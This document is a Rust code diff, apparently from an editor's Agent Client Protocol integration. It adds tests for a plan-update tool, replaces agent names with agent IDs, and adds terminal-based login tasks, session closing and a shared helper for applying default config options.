+ .expect("replay should succeed");
+ });
+
+ let plan = event_rx.expect_plan().await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "Inspect the existing tool wiring",
+ acp::PlanEntryPriority::High,
+ acp::PlanEntryStatus::Completed,
+ ),
+ acp::PlanEntry::new(
+ "Implement the update_plan tool",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Add tests",
+ acp::PlanEntryPriority::Low,
+ acp::PlanEntryStatus::Pending,
+ ),
+ ])
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_defaults_priority_to_medium(cx: &mut TestAppContext) {
+ let tool = Arc::new(UpdatePlanTool);
+ let (event_stream, mut event_rx) = ToolCallEventStream::test();
+
+ let input = UpdatePlanToolInput {
+ plan: vec![
+ PlanItem {
+ step: "First".to_string(),
+ status: PlanEntryStatus::InProgress,
+ priority: PlanEntryPriority::default(),
+ },
+ PlanItem {
+ step: "Second".to_string(),
+ status: PlanEntryStatus::InProgress,
+ priority: PlanEntryPriority::default(),
+ },
+ ],
+ };
+
+ let result = cx
+ .update(|cx| tool.run(ToolInput::resolved(input), event_stream, cx))
+ .await
+ .expect("tool should succeed");
+
+ assert_eq!(result, "Plan updated".to_string());
+
+ let plan = event_rx.expect_plan().await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "First",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Second",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ ])
+ );
+ }
+
+ #[gpui::test]
+ async fn test_initial_title(cx: &mut TestAppContext) {
+ let tool = UpdatePlanTool;
+
+ let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx));
+ assert_eq!(title, SharedString::from("Update plan"));
+
+ let title =
+ cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx));
+ assert_eq!(title, SharedString::from("Clear plan"));
+ }
+}
@@ -30,6 +30,7 @@ env_logger = { workspace = true, optional = true }
fs.workspace = true
futures.workspace = true
gpui.workspace = true
+feature_flags.workspace = true
gpui_tokio = { workspace = true, optional = true }
credentials_provider.workspace = true
google_ai.workspace = true
@@ -7,20 +7,22 @@ use action_log::ActionLog;
use agent_client_protocol::{self as acp, Agent as _, ErrorCode};
use anyhow::anyhow;
use collections::HashMap;
+use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _};
use futures::AsyncBufReadExt as _;
use futures::io::BufReader;
-use project::Project;
-use project::agent_server_store::{AgentServerCommand, GEMINI_NAME};
+use project::agent_server_store::AgentServerCommand;
+use project::{AgentId, Project};
use serde::Deserialize;
use settings::Settings as _;
-use task::ShellBuilder;
+use task::{ShellBuilder, SpawnInTerminal};
use util::ResultExt as _;
+use util::path_list::PathList;
use util::process::Child;
use std::path::PathBuf;
use std::process::Stdio;
+use std::rc::Rc;
use std::{any::Any, cell::RefCell};
-use std::{path::Path, rc::Rc};
use thiserror::Error;
use anyhow::{Context as _, Result};
@@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent};
use terminal::TerminalBuilder;
use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings};
+use crate::GEMINI_ID;
+
+pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli";
+
#[derive(Debug, Error)]
#[error("Unsupported version")]
pub struct UnsupportedVersion;
pub struct AcpConnection {
- server_name: SharedString,
- display_name: SharedString,
+ id: AgentId,
telemetry_id: SharedString,
connection: Rc<acp::ClientSideConnection>,
sessions: Rc<RefCell<HashMap<acp::SessionId, AcpSession>>>,
auth_methods: Vec<acp::AuthMethod>,
+ command: AgentServerCommand,
agent_capabilities: acp::AgentCapabilities,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList {
.into_iter()
.map(|s| AgentSessionInfo {
session_id: s.session_id,
- cwd: Some(s.cwd),
+ work_dirs: Some(PathList::new(&[s.cwd])),
title: s.title.map(Into::into),
updated_at: s.updated_at.and_then(|date_str| {
chrono::DateTime::parse_from_rfc3339(&date_str)
.ok()
.map(|dt| dt.with_timezone(&chrono::Utc))
}),
+ created_at: None,
meta: s.meta,
})
.collect(),
@@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList {
}
pub async fn connect(
- server_name: SharedString,
- display_name: SharedString,
+ agent_id: AgentId,
+ project: Entity<Project>,
command: AgentServerCommand,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -166,8 +173,8 @@ pub async fn connect(
cx: &mut AsyncApp,
) -> Result<Rc<dyn AgentConnection>> {
let conn = AcpConnection::stdio(
- server_name,
- display_name,
+ agent_id,
+ project,
command.clone(),
default_mode,
default_model,
@@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1
impl AcpConnection {
pub async fn stdio(
- server_name: SharedString,
- display_name: SharedString,
+ agent_id: AgentId,
+ project: Entity<Project>,
command: AgentServerCommand,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -195,6 +202,15 @@ impl AcpConnection {
let mut child =
builder.build_std_command(Some(command.path.display().to_string()), &command.args);
child.envs(command.env.iter().flatten());
+ if let Some(cwd) = project.update(cx, |project, cx| {
+ project
+ .default_path_list(cx)
+ .ordered_paths()
+ .next()
+ .cloned()
+ }) {
+ child.current_dir(cwd);
+ }
let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?;
let stdout = child.stdout.take().context("Failed to take stdout")?;
@@ -269,7 +285,7 @@ impl AcpConnection {
cx.update(|cx| {
AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| {
- registry.set_active_connection(server_name.clone(), &connection, cx)
+ registry.set_active_connection(agent_id.clone(), &connection, cx)
});
});
@@ -278,10 +294,11 @@ impl AcpConnection {
acp::InitializeRequest::new(acp::ProtocolVersion::V1)
.client_capabilities(
acp::ClientCapabilities::new()
- .fs(acp::FileSystemCapability::new()
+ .fs(acp::FileSystemCapabilities::new()
.read_text_file(true)
.write_text_file(true))
.terminal(true)
+ .auth(acp::AuthCapabilities::new().terminal(true))
// Experimental: Allow for rendering terminal output from the agents
.meta(acp::Meta::from_iter([
("terminal_output".into(), true.into()),
@@ -304,7 +321,7 @@ impl AcpConnection {
// Use the one the agent provides if we have one
.map(|info| info.name.into())
// Otherwise, just use the name
- .unwrap_or_else(|| server_name.clone());
+ .unwrap_or_else(|| agent_id.0.to_string().into());
let session_list = if response
.agent_capabilities
@@ -320,9 +337,9 @@ impl AcpConnection {
};
// TODO: Remove this override once Google team releases their official auth methods
- let auth_methods = if server_name == GEMINI_NAME {
+ let auth_methods = if agent_id.0.as_ref() == GEMINI_ID {
let mut args = command.args.clone();
- args.retain(|a| a != "--experimental-acp");
+ args.retain(|a| a != "--experimental-acp" && a != "--acp");
let value = serde_json::json!({
"label": "gemini /auth",
"command": command.path.to_string_lossy().into_owned(),
@@ -330,19 +347,19 @@ impl AcpConnection {
"env": command.env.clone().unwrap_or_default(),
});
let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]);
- vec![
- acp::AuthMethod::new("spawn-gemini-cli", "Login")
+ vec![acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login")
.description("Login with your Google or Vertex AI account")
.meta(meta),
- ]
+ )]
} else {
response.auth_methods
};
Ok(Self {
+ id: agent_id,
auth_methods,
+ command,
connection,
- server_name,
- display_name,
telemetry_id,
sessions,
agent_capabilities: response.agent_capabilities,
@@ -360,6 +377,102 @@ impl AcpConnection {
pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities {
&self.agent_capabilities.prompt_capabilities
}
+
+ fn apply_default_config_options(
+ &self,
+ session_id: &acp::SessionId,
+ config_options: &Rc<RefCell<Vec<acp::SessionConfigOption>>>,
+ cx: &mut AsyncApp,
+ ) {
+ let id = self.id.clone();
+ let defaults_to_apply: Vec<_> = {
+ let config_opts_ref = config_options.borrow();
+ config_opts_ref
+ .iter()
+ .filter_map(|config_option| {
+ let default_value = self.default_config_options.get(&*config_option.id.0)?;
+
+ let is_valid = match &config_option.kind {
+ acp::SessionConfigKind::Select(select) => match &select.options {
+ acp::SessionConfigSelectOptions::Ungrouped(options) => options
+ .iter()
+ .any(|opt| &*opt.value.0 == default_value.as_str()),
+ acp::SessionConfigSelectOptions::Grouped(groups) => {
+ groups.iter().any(|g| {
+ g.options
+ .iter()
+ .any(|opt| &*opt.value.0 == default_value.as_str())
+ })
+ }
+ _ => false,
+ },
+ _ => false,
+ };
+
+ if is_valid {
+ let initial_value = match &config_option.kind {
+ acp::SessionConfigKind::Select(select) => {
+ Some(select.current_value.clone())
+ }
+ _ => None,
+ };
+ Some((
+ config_option.id.clone(),
+ default_value.clone(),
+ initial_value,
+ ))
+ } else {
+ log::warn!(
+ "`{}` is not a valid value for config option `{}` in {}",
+ default_value,
+ config_option.id.0,
+ id
+ );
+ None
+ }
+ })
+ .collect()
+ };
+
+ for (config_id, default_value, initial_value) in defaults_to_apply {
+ cx.spawn({
+ let default_value_id = acp::SessionConfigValueId::new(default_value.clone());
+ let session_id = session_id.clone();
+ let config_id_clone = config_id.clone();
+ let config_opts = config_options.clone();
+ let conn = self.connection.clone();
+ async move |_| {
+ let result = conn
+ .set_session_config_option(acp::SetSessionConfigOptionRequest::new(
+ session_id,
+ config_id_clone.clone(),
+ default_value_id,
+ ))
+ .await
+ .log_err();
+
+ if result.is_none() {
+ if let Some(initial) = initial_value {
+ let mut opts = config_opts.borrow_mut();
+ if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) {
+ if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
+ select.current_value = initial;
+ }
+ }
+ }
+ }
+ }
+ })
+ .detach();
+
+ let mut opts = config_options.borrow_mut();
+ if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) {
+ if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
+ select.current_value = acp::SessionConfigValueId::new(default_value);
+ }
+ }
+ }
+ }
}
impl Drop for AcpConnection {
@@ -368,7 +481,69 @@ impl Drop for AcpConnection {
}
}
+fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String {
+ format!("external-agent-{}-{}-login", agent_id.0, method_id.0)
+}
+
+fn terminal_auth_task(
+ command: &AgentServerCommand,
+ agent_id: &AgentId,
+ method: &acp::AuthMethodTerminal,
+) -> SpawnInTerminal {
+ let mut args = command.args.clone();
+ args.extend(method.args.clone());
+
+ let mut env = command.env.clone().unwrap_or_default();
+ env.extend(method.env.clone());
+
+ acp_thread::build_terminal_auth_task(
+ terminal_auth_task_id(agent_id, &method.id),
+ method.name.clone(),
+ command.path.to_string_lossy().into_owned(),
+ args,
+ env,
+ )
+}
+
+/// Used to support the _meta method prior to stabilization
+fn meta_terminal_auth_task(
+ agent_id: &AgentId,
+ method_id: &acp::AuthMethodId,
+ method: &acp::AuthMethod,
+) -> Option<SpawnInTerminal> {
+ #[derive(Deserialize)]
+ struct MetaTerminalAuth {
+ label: String,
+ command: String,
+ #[serde(default)]
+ args: Vec<String>,
+ #[serde(default)]
+ env: HashMap<String, String>,
+ }
+
+ let meta = match method {
+ acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(),
+ acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(),
+ acp::AuthMethod::Agent(agent) => agent.meta.as_ref(),
+ _ => None,
+ }?;
+ let terminal_auth =
+ serde_json::from_value::<MetaTerminalAuth>(meta.get("terminal-auth")?.clone()).ok()?;
+
+ Some(acp_thread::build_terminal_auth_task(
+ terminal_auth_task_id(agent_id, method_id),
+ terminal_auth.label.clone(),
+ terminal_auth.command,
+ terminal_auth.args,
+ terminal_auth.env,
+ ))
+}
+
impl AgentConnection for AcpConnection {
+ fn agent_id(&self) -> AgentId {
+ self.id.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
self.telemetry_id.clone()
}
@@ -376,11 +551,14 @@ impl AgentConnection for AcpConnection {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
- let name = self.server_name.clone();
- let cwd = cwd.to_path_buf();
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
+ let name = self.id.0.clone();
let mcp_servers = mcp_servers_for_project(&project, cx);
cx.spawn(async move |cx| {
@@ -470,97 +648,15 @@ impl AgentConnection for AcpConnection {
}
if let Some(config_opts) = config_options.as_ref() {
- let defaults_to_apply: Vec<_> = {
- let config_opts_ref = config_opts.borrow();
- config_opts_ref
- .iter()
- .filter_map(|config_option| {
- let default_value = self.default_config_options.get(&*config_option.id.0)?;
-
- let is_valid = match &config_option.kind {
- acp::SessionConfigKind::Select(select) => match &select.options {
- acp::SessionConfigSelectOptions::Ungrouped(options) => {
- options.iter().any(|opt| &*opt.value.0 == default_value.as_str())
- }
- acp::SessionConfigSelectOptions::Grouped(groups) => groups
- .iter()
- .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())),
- _ => false,
- },
- _ => false,
- };
-
- if is_valid {
- let initial_value = match &config_option.kind {
- acp::SessionConfigKind::Select(select) => {
- Some(select.current_value.clone())
- }
- _ => None,
- };
- Some((config_option.id.clone(), default_value.clone(), initial_value))
- } else {
- log::warn!(
- "`{}` is not a valid value for config option `{}` in {}",
- default_value,
- config_option.id.0,
- name
- );
- None
- }
- })
- .collect()
- };
-
- for (config_id, default_value, initial_value) in defaults_to_apply {
- cx.spawn({
- let default_value_id = acp::SessionConfigValueId::new(default_value.clone());
- let session_id = response.session_id.clone();
- let config_id_clone = config_id.clone();
- let config_opts = config_opts.clone();
- let conn = self.connection.clone();
- async move |_| {
- let result = conn
- .set_session_config_option(
- acp::SetSessionConfigOptionRequest::new(
- session_id,
- config_id_clone.clone(),
- default_value_id,
- ),
- )
- .await
- .log_err();
-
- if result.is_none() {
- if let Some(initial) = initial_value {
- let mut opts = config_opts.borrow_mut();
- if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) {
- if let acp::SessionConfigKind::Select(select) =
- &mut opt.kind
- {
- select.current_value = initial;
- }
- }
- }
- }
- }
- })
- .detach();
-
- let mut opts = config_opts.borrow_mut();
- if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) {
- if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
- select.current_value = acp::SessionConfigValueId::new(default_value);
- }
- }
- }
+ self.apply_default_config_options(&response.session_id, config_opts, cx);
}
let action_log = cx.new(|_| ActionLog::new(project.clone()));
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
- self.display_name.clone(),
- Some(cwd),
+ None,
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -601,7 +697,7 @@ impl AgentConnection for AcpConnection {
self: Rc<Self>,
session_id: acp::SessionId,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -610,16 +706,18 @@ impl AgentConnection for AcpConnection {
"Loading sessions is not supported by this agent.".into()
))));
}
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
- let cwd = cwd.to_path_buf();
let mcp_servers = mcp_servers_for_project(&project, cx);
let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let title = title.unwrap_or_else(|| self.display_name.clone());
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
title,
- Some(cwd.clone()),
+ Some(work_dirs.clone()),
self.clone(),
project,
action_log,
@@ -640,7 +738,7 @@ impl AgentConnection for AcpConnection {
},
);
- cx.spawn(async move |_| {
+ cx.spawn(async move |cx| {
let response = match self
.connection
.load_session(
@@ -657,6 +755,11 @@ impl AgentConnection for AcpConnection {
let (modes, models, config_options) =
config_state(response.modes, response.models, response.config_options);
+
+ if let Some(config_opts) = config_options.as_ref() {
+ self.apply_default_config_options(&session_id, config_opts, cx);
+ }
+
if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) {
session.session_modes = modes;
session.models = models;
@@ -671,7 +774,7 @@ impl AgentConnection for AcpConnection {
self: Rc<Self>,
session_id: acp::SessionId,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -685,16 +788,18 @@ impl AgentConnection for AcpConnection {
"Resuming sessions is not supported by this agent.".into()
))));
}
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
- let cwd = cwd.to_path_buf();
let mcp_servers = mcp_servers_for_project(&project, cx);
let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let title = title.unwrap_or_else(|| self.display_name.clone());
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
title,
- Some(cwd.clone()),
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -715,7 +820,7 @@ impl AgentConnection for AcpConnection {
},
);
- cx.spawn(async move |_| {
+ cx.spawn(async move |cx| {
let response = match self
.connection
.resume_session(
@@ -733,6 +838,11 @@ impl AgentConnection for AcpConnection {
let (modes, models, config_options) =
config_state(response.modes, response.models, response.config_options);
+
+ if let Some(config_opts) = config_options.as_ref() {
+ self.apply_default_config_options(&session_id, config_opts, cx);
+ }
+
if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) {
session.session_modes = modes;
session.models = models;
@@ -743,10 +853,53 @@ impl AgentConnection for AcpConnection {
})
}
+ fn supports_close_session(&self) -> bool {
+ self.agent_capabilities.session_capabilities.close.is_some()
+ }
+
+ fn close_session(
+ self: Rc<Self>,
+ session_id: &acp::SessionId,
+ cx: &mut App,
+ ) -> Task<Result<()>> {
+ if !self.supports_close_session() {
+ return Task::ready(Err(anyhow!(LoadError::Other(
+ "Closing sessions is not supported by this agent.".into()
+ ))));
+ }
+
+ let conn = self.connection.clone();
+ let session_id = session_id.clone();
+ cx.foreground_executor().spawn(async move {
+ conn.close_session(acp::CloseSessionRequest::new(session_id.clone()))
+ .await?;
+ self.sessions.borrow_mut().remove(&session_id);
+ Ok(())
+ })
+ }
+
fn auth_methods(&self) -> &[acp::AuthMethod] {
&self.auth_methods
}
+ fn terminal_auth_task(
+ &self,
+ method_id: &acp::AuthMethodId,
+ cx: &App,
+ ) -> Option<SpawnInTerminal> {
+ let method = self
+ .auth_methods
+ .iter()
+ .find(|method| method.id() == method_id)?;
+
+ match method {
+ acp::AuthMethod::Terminal(terminal) if cx.has_flag::<AcpBetaFeatureFlag>() => {
+ Some(terminal_auth_task(&self.command, &self.id, terminal))
+ }
+ _ => meta_terminal_auth_task(&self.id, method_id, method),
+ }
+ }
+
fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task<Result<()>> {
let conn = self.connection.clone();
cx.foreground_executor().spawn(async move {
@@ -913,6 +1066,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error {
}
}
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn terminal_auth_task_reuses_command_and_merges_args_and_env() {
+ let command = AgentServerCommand {
+ path: "/path/to/agent".into(),
+ args: vec!["--acp".into(), "--verbose".into()],
+ env: Some(HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("SHARED".into(), "base".into()),
+ ])),
+ };
+ let method = acp::AuthMethodTerminal::new("login", "Login")
+ .args(vec!["/auth".into()])
+ .env(std::collections::HashMap::from_iter([
+ ("EXTRA".into(), "2".into()),
+ ("SHARED".into(), "override".into()),
+ ]));
+
+ let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method);
+
+ assert_eq!(
+ terminal_auth_task.command.as_deref(),
+ Some("/path/to/agent")
+ );
+ assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("SHARED".into(), "override".into()),
+ ("EXTRA".into(), "2".into()),
+ ])
+ );
+ assert_eq!(terminal_auth_task.label, "Login");
+ assert_eq!(terminal_auth_task.command_label, "Login");
+ }
+
+ #[test]
+ fn legacy_terminal_auth_task_parses_meta_and_retries_session() {
+ let method_id = acp::AuthMethodId::new("legacy-login");
+ let method = acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ "command": "legacy-agent",
+ "args": ["auth", "--interactive"],
+ "env": {
+ "AUTH_MODE": "interactive",
+ },
+ }),
+ )])),
+ );
+
+ let terminal_auth_task =
+ meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method)
+ .expect("expected legacy terminal auth task");
+
+ assert_eq!(
+ terminal_auth_task.id.0,
+ "external-agent-test-agent-legacy-login-login"
+ );
+ assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent"));
+ assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())])
+ );
+ assert_eq!(terminal_auth_task.label, "legacy /auth");
+ }
+
+ #[test]
+ fn legacy_terminal_auth_task_returns_none_for_invalid_meta() {
+ let method_id = acp::AuthMethodId::new("legacy-login");
+ let method = acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ }),
+ )])),
+ );
+
+ assert!(
+ meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none()
+ );
+ }
+
+ #[test]
+ fn first_class_terminal_auth_takes_precedence_over_legacy_meta() {
+ let method_id = acp::AuthMethodId::new("login");
+ let method = acp::AuthMethod::Terminal(
+ acp::AuthMethodTerminal::new(method_id, "Login")
+ .args(vec!["/auth".into()])
+ .env(std::collections::HashMap::from_iter([(
+ "AUTH_MODE".into(),
+ "first-class".into(),
+ )]))
+ .meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ "command": "legacy-agent",
+ "args": ["legacy-auth"],
+ "env": {
+ "AUTH_MODE": "legacy",
+ },
+ }),
+ )])),
+ );
+
+ let command = AgentServerCommand {
+ path: "/path/to/agent".into(),
+ args: vec!["--acp".into()],
+ env: Some(HashMap::from_iter([("BASE".into(), "1".into())])),
+ };
+
+ let terminal_auth_task = match &method {
+ acp::AuthMethod::Terminal(terminal) => {
+ terminal_auth_task(&command, &AgentId::new("test-agent"), terminal)
+ }
+ _ => unreachable!(),
+ };
+
+ assert_eq!(
+ terminal_auth_task.command.as_deref(),
+ Some("/path/to/agent")
+ );
+ assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("AUTH_MODE".into(), "first-class".into()),
+ ])
+ );
+ assert_eq!(terminal_auth_task.label, "Login");
+ }
+}
+
fn mcp_servers_for_project(project: &Entity<Project>, cx: &App) -> Vec<acp::McpServer> {
let context_server_store = project.read(cx).context_server_store().read(cx);
let is_local = project.read(cx).is_local();
@@ -1167,7 +1463,7 @@ impl acp::Client for ClientDelegate {
let outcome = task.await;
- Ok(acp::RequestPermissionResponse::new(outcome))
+ Ok(acp::RequestPermissionResponse::new(outcome.into()))
}
async fn write_text_file(
@@ -1372,10 +1668,10 @@ impl acp::Client for ClientDelegate {
Ok(acp::CreateTerminalResponse::new(terminal_id))
}
- async fn kill_terminal_command(
+ async fn kill_terminal(
&self,
- args: acp::KillTerminalCommandRequest,
- ) -> Result<acp::KillTerminalCommandResponse, acp::Error> {
+ args: acp::KillTerminalRequest,
+ ) -> Result<acp::KillTerminalResponse, acp::Error> {
self.session_thread(&args.session_id)?
.update(&mut self.cx.clone(), |thread, cx| {
thread.kill_terminal(args.terminal_id, cx)
@@ -9,50 +9,40 @@ use collections::{HashMap, HashSet};
pub use custom::*;
use fs::Fs;
use http_client::read_no_proxy_from_env;
-use project::agent_server_store::AgentServerStore;
+use project::{AgentId, Project, agent_server_store::AgentServerStore};
use acp_thread::AgentConnection;
use anyhow::Result;
-use gpui::{App, AppContext, Entity, SharedString, Task};
-use project::Project;
+use gpui::{App, AppContext, Entity, Task};
use settings::SettingsStore;
use std::{any::Any, rc::Rc, sync::Arc};
-pub use acp::AcpConnection;
+pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID};
pub struct AgentServerDelegate {
store: Entity<AgentServerStore>,
- project: Entity<Project>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available: Option<watch::Sender<Option<String>>>,
}
impl AgentServerDelegate {
pub fn new(
store: Entity<AgentServerStore>,
- project: Entity<Project>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_tx: Option<watch::Sender<Option<String>>>,
) -> Self {
Self {
store,
- project,
- status_tx,
new_version_available: new_version_tx,
}
}
-
- pub fn project(&self) -> &Entity<Project> {
- &self.project
- }
}
pub trait AgentServer: Send {
fn logo(&self) -> ui::IconName;
- fn name(&self) -> SharedString;
+ fn agent_id(&self) -> AgentId;
fn connect(
&self,
delegate: AgentServerDelegate,
+ project: Entity<Project>,
cx: &mut App,
) -> Task<Result<Rc<dyn AgentConnection>>>;
@@ -5,29 +5,34 @@ use anyhow::{Context as _, Result};
use collections::HashSet;
use credentials_provider::CredentialsProvider;
use fs::Fs;
-use gpui::{App, AppContext as _, SharedString, Task};
+use gpui::{App, AppContext as _, Entity, Task};
use language_model::{ApiKey, EnvVar};
-use project::agent_server_store::{
- AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME,
+use project::{
+ Project,
+ agent_server_store::{AgentId, AllAgentServersSettings},
};
use settings::{SettingsStore, update_settings_file};
use std::{rc::Rc, sync::Arc};
use ui::IconName;
+pub const GEMINI_ID: &str = "gemini";
+pub const CLAUDE_AGENT_ID: &str = "claude-acp";
+pub const CODEX_ID: &str = "codex-acp";
+
/// A generic agent server implementation for custom user-defined agents
pub struct CustomAgentServer {
- name: SharedString,
+ agent_id: AgentId,
}
impl CustomAgentServer {
- pub fn new(name: SharedString) -> Self {
- Self { name }
+ pub fn new(agent_id: AgentId) -> Self {
+ Self { agent_id }
}
}
impl AgentServer for CustomAgentServer {
- fn name(&self) -> SharedString {
- self.name.clone()
+ fn agent_id(&self) -> AgentId {
+ self.agent_id.clone()
}
fn logo(&self) -> IconName {
@@ -38,7 +43,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().0.as_ref())
.cloned()
});
@@ -55,7 +60,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().0.as_ref())
.cloned()
});
@@ -80,7 +85,7 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
let config_id = config_id.to_string();
let value_id = value_id.to_string();
@@ -88,8 +93,8 @@ impl AgentServer for CustomAgentServer {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom {
@@ -124,13 +129,13 @@ impl AgentServer for CustomAgentServer {
}
fn set_default_mode(&self, mode_id: Option<acp::SessionModeId>, fs: Arc<dyn Fs>, cx: &mut App) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom { default_mode, .. }
@@ -146,7 +151,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -156,13 +161,13 @@ impl AgentServer for CustomAgentServer {
}
fn set_default_model(&self, model_id: Option<acp::ModelId>, fs: Arc<dyn Fs>, cx: &mut App) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
